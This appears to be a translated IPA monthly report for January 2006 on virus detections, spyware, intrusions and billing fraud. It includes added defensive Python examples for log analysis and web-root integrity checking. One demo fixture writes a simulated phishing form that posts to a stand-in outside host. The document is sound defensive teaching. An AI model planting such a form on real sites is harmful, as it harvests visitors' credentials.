This is a summary of the computer virus and unauthorized computer access incident reports for January 2006, compiled by IPA.
Reminder for the Month: "Malicious code may be installed if you ignore an alert!"
- You don't ignore alerts, do you?
-
The most frequent consultations at present concern damage of the following kind: malicious code was installed automatically, or the PC was infected by a virus, when the user opened an e-mail attachment or clicked a link or image posted on a blog or bulletin board while browsing. Moreover, such damage (virus infection, information leakage, etc.) keeps occurring even on PCs that have anti-virus software or personal firewall software installed.
Analysis of "one-click billing fraud" cases, which rank first among the consultations received by IPA, shows that a certain "alert" is displayed at the point where the damage occurs. In other words, the user suffers the damage because he or she ignores that alert.
<The alert when a virus or spyware is about to be embedded>
Be cautious if the following alert is displayed when you try to open a file you believe to be an image or an animation. This "Security Warning" is a message from the OS (Windows XP) to protect the system. If anything seems suspicious, check the file "type" and "source" shown in the dialog, and do not click "Run" or "Execute" unless you are sure the file is safe. A genuine image or animation file does not produce this warning; a file that does is an executable program, whatever its icon or name suggests.

<Alert relevant to unauthorized access>
Be cautious if an alert such as the one shown at right appears when you are not deliberately communicating with anything. This alert is a message from personal firewall software. It is likely that a virus or spyware that has already got in is attempting to send information outside. When such a confirmation screen appears, check the program name or file name it shows, and do not click "Allow connection" unless you are sure the program is legitimate.

<Reference>
IPA – "How to respond when billed for simply clicking on a site" (in Japanese)
http://www.ipa.go.jp/security/ciadr/oneclick.html
IPA – "7 anti-virus measures for PC users" (in Japanese)
http://www.ipa.go.jp/security/antivirus/7kajonew.html
IPA – "5 anti-spyware measures for PC users" (in Japanese)
http://www.ipa.go.jp/security/antivirus/spyware5kajyou.html
I.
Reporting Status for Computer Virus
– Please refer to Attachment 1 for further details –
The detection number [1] of viruses was about 4.13M, a decrease of about 70% from the 13.44M counted in December.
The December figure had been inflated by a specific variant of W32/Sober, which pushed up the overall detection number by sending massive numbers of virus mails. Since that variant stopped its mail-sending activity, the overall detection number fell sharply. (The detection number of W32/Sober was 10.75M in December and 1.63M in January, a decrease of about 85%.)
In addition, the reported number [2] in January was 4,499, an increase of 4.8% from 4,293 in December.
[1] Detection number: the cumulative count of virus copies found by the reporting parties (filers). In January, about 4.13M detections were reported; after aggregation these became 4,499 reported cases.
[2] Reported number: viruses of the same type (including its variants) reported by the same filer on the same day are counted as one case, regardless of how many copies were actually found. In January the reported number was 4,499, aggregated from about 4.13M detections.
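The relationship between the two metrics is easiest to see in code. The following is an added example, not IPA's own aggregation software; the records are constructed, and the assumption (taken from the ranking by family later in this section) is that variants are grouped under their family name.

```python
from collections import defaultdict
from datetime import date

# Constructed sample detection records (not IPA data): one record per
# detection event that a reporting party ("filer") submitted.
# (filer, report date, virus family, number of copies detected)
SAMPLE_RECORDS = [
    ("org-A", date(2006, 1, 10), "W32/Netsky", 1200),
    ("org-A", date(2006, 1, 10), "W32/Netsky", 800),   # same filer/day/family: 1 case
    ("org-A", date(2006, 1, 10), "W32/Sober", 300),
    ("org-B", date(2006, 1, 10), "W32/Netsky", 50),    # different filer: new case
    ("org-A", date(2006, 1, 11), "W32/Netsky", 5),     # next day: new case
    ("org-C", date(2006, 1, 12), "W32/Mytob", 1),
]


def detection_number(records):
    """Detection number: the sum of every copy every filer found."""
    return sum(count for _, _, _, count in records)


def reported_number(records):
    """Reported number: one case per (filer, day, family), however many
    copies that filer found on that day (assumed grouping by family)."""
    return len({(filer, day, family) for filer, day, family, _ in records})


def per_family(records):
    """Both metrics broken down by family, for a 'worst detection' ranking.
    Returns {family: (detection number, reported number)}."""
    detections = defaultdict(int)
    cases = defaultdict(set)
    for filer, day, family, count in records:
        detections[family] += count
        cases[family].add((filer, day))
    return {f: (detections[f], len(cases[f])) for f in detections}


if __name__ == "__main__":
    print("detection number:", detection_number(SAMPLE_RECORDS))
    print("reported number: ", reported_number(SAMPLE_RECORDS))
    for family, (det, rep) in sorted(per_family(SAMPLE_RECORDS).items(),
                                     key=lambda kv: -kv[1][0]):
        print(f"{family}: {det} detections, {rep} cases")
```

The example makes the point of footnote [2] concrete: a single mass-mailing worm can multiply the detection number by orders of magnitude (as W32/Sober did in December) while moving the reported number only slightly, which is why the two figures move independently in the text above.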
The highest detection number was for W32/Netsky, about 2.04M, followed by W32/Sober with about 1.63M and W32/Mytob with about 0.29M.

(Note: in the accompanying chart, numbers in parentheses are the figures for the previous month.)
II.
About Spyware
Consultations about spyware (*1) that is installed simply by clicking an image on an adult site and that steals the user's e-mail address have increased over last year. Once the address has been stolen, the damage continues in the form of suspicious billing statements arriving by e-mail. To avoid such damage, take the following countermeasures and do not casually download suspicious files.
1. Use anti-spyware software, keep its definition files updated, and check whether spyware is present.
2. Keep your computer up to date by applying patches promptly.
3. Be cautious with suspicious sites and questionable mails.
4. Raise your computer's security settings.
5. Back up necessary files as a further precaution.
Brochure for Anti-Spyware Measures (in Japanese)
http://www.ipa.go.jp/security/antivirus/shiori.html
III.
Reporting Status for Unauthorized Computer Access (including consultations) – Please refer to Attachment 2 for further details –
Reports of unauthorized computer access and consultations accepted
                          | Aug. | Sep. | Oct. | Nov. | Dec. | Jan. '06
Total reported (a)        |  41  |  31  |  22  |  24  |  25  |  50
  Damaged (b)             |  12  |  16  |  15  |  15  |  19  |  13
  Not damaged (c)         |  29  |  15  |   7  |   9  |   6  |  37
Total consultations (d)   |  43  |  30  |  35  |  30  |  25  |  43
  Damaged (e)             |  23  |  16  |  25  |  18  |  15  |  23
  Not damaged (f)         |  20  |  14  |  10  |  12  |  10  |  20
Grand total (a + d)       |  84  |  61  |  57  |  54  |  50  |  93
  Damaged (b + e)         |  35  |  32  |  40  |  33  |  34  |  36
  Not damaged (c + f)     |  49  |  29  |  17  |  21  |  16  |  57
1. Reporting status of unauthorized computer access
The reported number for January was 50, of which 13 involved actual damage.
2. Consultations on unauthorized computer access, etc.
The number of consultations relevant to unauthorized computer access was 43, of which 23 (6 of these were also counted among the reports) involved damage of some sort.
3. Status of damage
The breakdown of the damage reports was: intrusion, 11 cases; other damage, 2 cases. Among the intrusions, 3 cases followed attacks on the port (*2) used by SSH (*3); in 2 cases a Web server was intruded and content to be exploited for phishing was planted on it; and in 2 cases the intrusion exploited a vulnerability in a PHP (*5) library implementing XML-RPC (*4).
Damage instances:
<Intrusion>
(i) Attacks on the port used by SSH
<Instance>
- A network monitoring device detected frequent SSH connection attempts from an internal server to servers outside.
- Checking the server's logs (*6) confirmed that it was making unauthorized SSH connection attempts to outside servers (the server had been turned into a stepping stone for attacks on other sites).
- A test account (*7) that was no longer used had been left on the server. Because its password was weak, the password was guessed and the server was intruded.
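The chain in this instance (password guessing against a forgotten account, then a successful login from the same source) is visible in sshd's own log before the server ever starts attacking others. The following is an added example, not from IPA's report or from the organization concerned; the log lines are constructed in OpenSSH syslog format, and the set of dormant accounts is an assumed input the administrator supplies.

```python
import re
from collections import defaultdict

# Constructed sample lines in OpenSSH syslog format (not from any real host).
SAMPLE_AUTH_LOG = """\
Jan 14 03:12:01 web1 sshd[2210]: Failed password for invalid user admin from 203.0.113.5 port 40122 ssh2
Jan 14 03:12:03 web1 sshd[2212]: Failed password for root from 203.0.113.5 port 40123 ssh2
Jan 14 03:12:05 web1 sshd[2214]: Failed password for test from 203.0.113.5 port 40124 ssh2
Jan 14 03:12:07 web1 sshd[2216]: Failed password for test from 203.0.113.5 port 40125 ssh2
Jan 14 03:12:09 web1 sshd[2218]: Failed password for test from 203.0.113.5 port 40126 ssh2
Jan 14 03:12:11 web1 sshd[2220]: Accepted password for test from 203.0.113.5 port 40127 ssh2
Jan 14 08:30:44 web1 sshd[2401]: Accepted publickey for alice from 198.51.100.7 port 51000 ssh2
"""

# Matches both "Failed password for invalid user X from IP port N ssh2"
# and "Accepted publickey for X from IP port N ssh2".
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse(log_text):
    """Yield one dict per authentication event; non-auth lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            events.append(m.groupdict())
    return events


def find_suspicious_logins(log_text, dormant_accounts, fail_threshold=3):
    """Return alerts as (kind, source, user) tuples:
      guessing                - a source reached fail_threshold failures
      success_after_failures  - an accepted login from such a source
      dormant_account_login   - an accepted login to an account on the
                                 dormant list (assumed input), whatever the source
    """
    failures = defaultdict(int)
    alerts = []
    for ev in parse(log_text):
        if ev["result"] == "Failed":
            failures[ev["src"]] += 1
            if failures[ev["src"]] == fail_threshold:
                alerts.append(("guessing", ev["src"], None))
        else:
            if failures[ev["src"]] >= fail_threshold:
                alerts.append(("success_after_failures", ev["src"], ev["user"]))
            if ev["user"] in dormant_accounts:
                alerts.append(("dormant_account_login", ev["src"], ev["user"]))
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_logins(SAMPLE_AUTH_LOG, dormant_accounts={"test"}):
        print(alert)
```

The second and third alert kinds are the ones worth paging on: a guessing burst alone is background noise on any Internet-facing SSH port, but a success from the guessing source, or any login to an account nobody should be using, is the intrusion itself. The prevention side is simpler than the detection side: remove or lock accounts that are no longer needed, and disable password authentication in favour of keys so that guessing cannot succeed at all.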
(ii) Planting of content used for phishing fraud, and leakage of private information
<Instance>
- A report from outside stated that, when accessing the organization's own Web site, a forged page masquerading as a well-known shopping site was displayed.
- The content for the fake page (evidently used for phishing fraud) had been placed on the organization's Web server. In addition, the administrator's password had been changed, so the server administrator could no longer log in to the server.
- The likely causes were that no firewall had been set up and the software had not been updated.
- Since the intruded server held private information, that information may have leaked outside.
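In this instance the organization learned of the planted page from an outsider. A content baseline lets the operator notice added or altered files first. The following is an added example, not IPA's or the organization's tooling; the `demo()` function constructs a throw-away web root and a simulated intrusion so that the block runs offline.

```python
import hashlib
import os
import tempfile


def snapshot(root):
    """Map each file under root (path relative to root) to its SHA-256 digest."""
    digests = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                digest = hashlib.sha256(f.read()).hexdigest()
            digests[os.path.relpath(path, root)] = digest
    return digests


def compare(baseline, current):
    """Classify differences between two snapshots."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Constructed walkthrough (assumed file names): baseline a small web root,
    then simulate an intruder dropping a look-alike shop page and editing
    index.html to pull it in, and report what changed."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "img"))
        with open(os.path.join(root, "index.html"), "w") as f:
            f.write("<h1>Our organization</h1>\n")
        with open(os.path.join(root, "img", "logo.png"), "wb") as f:
            f.write(b"\x89PNG\r\n\x1a\n")
        baseline = snapshot(root)          # taken while the site is known-good

        # --- simulated intrusion: phishing content planted, index altered ---
        os.makedirs(os.path.join(root, "shop-login"))
        with open(os.path.join(root, "shop-login", "index.html"), "w") as f:
            f.write("<form action='http://203.0.113.9/collect'>...</form>\n")
        with open(os.path.join(root, "index.html"), "a") as f:
            f.write("<iframe src='shop-login/'></iframe>\n")

        return compare(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Store the baseline (and the comparison job) somewhere the Web server cannot write, and ideally off the box: in this instance the intruder had already changed the administrator's password, so a baseline kept on the compromised server could have been rewritten as easily as the pages were.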
(iii) Intrusion exploiting a vulnerability in XML-RPC
<Instance>
- A report from outside stated that the Web server had been intruded and its home page altered.
- The cause was exploitation of a "vulnerability in XML-RPC" in the PHP library incorporated in the Web server.
- The vulnerable library was not actually being used by the site. Code that sits on the server is reachable by an attacker whether or not the site uses it, so libraries the site does not need should be removed or disabled, and the rest kept updated.
IV.
Consultations Accepted
The number of consultations in January was 748. Of these, 173 concerned so-called "one-click billing fraud", such as receiving "billing" mails after browsing an adult site; these remain consistently numerous. In addition, nearly 90% of the consultations relevant to one-click billing fraud were cases in which malicious code such as spyware had been embedded. <Trend in one-click billing fraud consultations: July 28, August 83, September 80, October 108, November 165, December 138>
Trend in the total number of consultations accepted by IPA
                          | Aug. | Sep. | Oct. | Nov. | Dec. | Jan. '06
Total                     |  629 |  554 |  606 |  673 |  653 |  748
  Automatic response      |  376 |  337 |  357 |  379 |  391 |  425
  Telephone               |  179 |  144 |  165 |  220 |  194 |  228
  E-mail                  |   67 |   72 |   82 |   66 |   66 |   87
  Fax, others             |    7 |    1 |    2 |    8 |    2 |    8
*IPA consults and advises on computer viruses and unauthorized computer access, as well as on other matters concerning overall security issues.
Mail:
for virus issues, for
crack issues.
Tel.: +81-3-5978-7509
(24-hour automatic response)
Fax: +81-3-5978-7518
(24-hour automatic response)
*The Total row includes the figures in the Consultation (d) row of the table in "III. Reporting Status for Unauthorized Computer Access".
*"Automatic response": consultations accepted by the automatic response system.
*"Telephone": consultations accepted by Security Center personnel.
The main consultation instances were as follows:
(i) What if an e-mail informs you that you have won a prize?
Consultation:
I received an e-mail saying "You won \1,000,000" without any warning. The scheme was that if I sent a blank e-mail, and then replied again with the necessary information filled in to the designated address, \1,000,000 would be remitted to me. I therefore sent back the e-mail including my bank account details. \1,000,000 has not yet been remitted, but the same winning mail still arrives almost every day.
Response:
This is most likely a fake prize-winning mail, and may be a phishing fraud to obtain the user's name, bank account details, etc. Do not readily believe suspicious mail from senders you do not know; always suspect that "this may be a trap", particularly when you are asked to enter your private information.
(ii) What if private information leaked because of a virus infection?
Consultation:
I was infected by a virus while using Winny. Private information such as my name and address was leaked by the virus. What should I do?
Response:
In practice, it is impossible to retrieve data that has already spread over a file-sharing network. When you use file-sharing software, recognize this risk and take thorough security measures, such as installing anti-virus software.
<Reference>
IPA – "Dos and Don'ts when using file-sharing software" (in Japanese)
http://www.ipa.go.jp/security/topics/20050623_exchange.html
In addition, please also refer to the following site for further information on one-click billing fraud, which still accounts for a large number of consultations.
IPA – "Countermeasures when billed for simply clicking" (in Japanese)
http://www.ipa.go.jp/security/ciadr/oneclick.html
V.
Access Status Captured by the Internet Monitoring System (TALOT2) in January
In the Internet Monitoring system (TALOT2), unwanted (one-sided) accesses in January totaled 415,438 across 10 monitoring points; at a single monitoring point, about 1,340 accesses from about 357 sources were captured per day.
The environment of each TALOT2 monitoring point is close to a general user's Internet connection, so general Internet users can be expected to receive the same amount of unwanted (one-sided) access. In other words, on average your computer is being accessed about 1,340 times a day from about 357 unknown sources, roughly 4 accesses per source, and these accesses can be regarded as unauthorized.

Chart 5.1: Number of unwanted (one-sided) accesses and number of sources, per monitoring point per day
Chart 5.1 shows the average number of accesses and number of sources per monitoring point per day from June 2004 to January 2006. It indicates that unwanted (one-sided) accesses, and the number of sources they come from, are both decreasing moderately.
The access status in January shows that unauthorized accesses apparently targeting vulnerabilities in Windows remain numerous: accesses to ports 135 (TCP) and 445 (TCP), which account for a disproportionately large share, target Windows vulnerabilities. In addition, while surfing you may see pop-up messages urging you to take anti-virus or anti-intrusion measures, and pop-up ads from adware; be careful not to be fooled by such content.
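The per-day averages and the port ranking described in this section are the same reduction any administrator can run over a firewall's dropped-packet log. The following is an added example, not TALOT2's own software; the log format and the sample lines are constructed, and the sensor is assumed to log every unsolicited inbound attempt it drops (which is what makes an access "one-sided").

```python
import re
from collections import Counter, defaultdict

# Constructed sample of unsolicited inbound attempts dropped at one sensor
# (e.g. a home router's packet log). Assumed format; not TALOT2 data.
SAMPLE_SENSOR_LOG = """\
2006-01-14 03:12:01 DROP TCP 203.0.113.5:40122 -> 192.0.2.10:445
2006-01-14 03:12:02 DROP TCP 203.0.113.5:40123 -> 192.0.2.10:135
2006-01-14 03:15:40 DROP TCP 198.51.100.7:1025 -> 192.0.2.10:445
2006-01-14 09:00:00 DROP UDP 198.51.100.9:1026 -> 192.0.2.10:1026
2006-01-15 01:02:03 DROP TCP 203.0.113.77:3210 -> 192.0.2.10:445
2006-01-15 01:02:04 DROP TCP 203.0.113.77:3211 -> 192.0.2.10:135
2006-01-15 05:55:55 DROP TCP 192.0.2.200:40000 -> 192.0.2.10:22
"""

LINE_RE = re.compile(
    r"^(?P<day>\d{4}-\d\d-\d\d) \S+ DROP (?P<proto>TCP|UDP) "
    r"(?P<src>[\d.]+):\d+ -> [\d.]+:(?P<dport>\d+)$"
)


def summarize(log_text, top_n=3):
    """Per-day averages of accesses and distinct sources, plus the most
    targeted destination ports, in the style of the TALOT2 figures."""
    per_day_access = Counter()
    per_day_sources = defaultdict(set)
    ports = Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # skip lines that are not drops
        per_day_access[m["day"]] += 1
        per_day_sources[m["day"]].add(m["src"])
        ports[f'{m["dport"]}/{m["proto"]}'] += 1
    days = len(per_day_access)
    if days == 0:
        return {"accesses_per_day": 0.0, "sources_per_day": 0.0, "top_ports": []}
    return {
        "accesses_per_day": sum(per_day_access.values()) / days,
        "sources_per_day": sum(len(s) for s in per_day_sources.values()) / days,
        "top_ports": ports.most_common(top_n),
    }


if __name__ == "__main__":
    summary = summarize(SAMPLE_SENSOR_LOG)
    print(f"accesses/day: {summary['accesses_per_day']:.1f}")
    print(f"sources/day:  {summary['sources_per_day']:.1f}")
    print("top ports:   ", summary["top_ports"])
```

Distinct sources are counted per day and then averaged, as the text does, so a source that returns on several days is counted each day. On a real sensor the top of the port list in this period would look like the text says: 445/TCP and 135/TCP far ahead of everything else.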
Please refer to the following document for details of the above (in Japanese):
"Attachment 3: Access Status Captured by the Internet Monitoring System (TALOT2)"
http://www.ipa.go.jp/security/txt/2006/documents/TALOT2-0602.pdf
"Various statistics provided by other organizations and vendors are published at the following sites"
"Glossary"
(*1) Spyware: software that fraudulently collects information such as the user's personal data and access history and automatically sends it to a third party.
(*2) Port: an interface ("window") through which each service on a computer exchanges information with the outside. Numbers from 0 to 65535 are used, hence the term "port number".
(*3) SSH (Secure Shell): a protocol, and the programs implementing it, for logging in to another computer over a network, executing commands on the remote computer, and transferring files. Because the data sent over the network is encrypted, these operations can be carried out safely over the Internet.
(*4) XML-RPC (eXtensible Markup Language – Remote Procedure Call): a protocol for performing RPC over the Internet using XML. RPC (remote procedure call) is a mechanism for invoking a procedure on another computer connected to the network.
(*5) PHP (PHP: Hypertext Preprocessor): a general-purpose scripting language suited to dynamic Web page generation. PHP code can be embedded in HTML.
(*6) Log: a record of the use of a computer or of data communication. Generally the operator's ID, the date and time, and the content of each operation are recorded.
(*7) Account: the right granted to a user to use resources on a computer or network; it also refers to the ID needed to do so.
- Attachment 3: Observation Status by the Internet Monitoring System (TALOT2)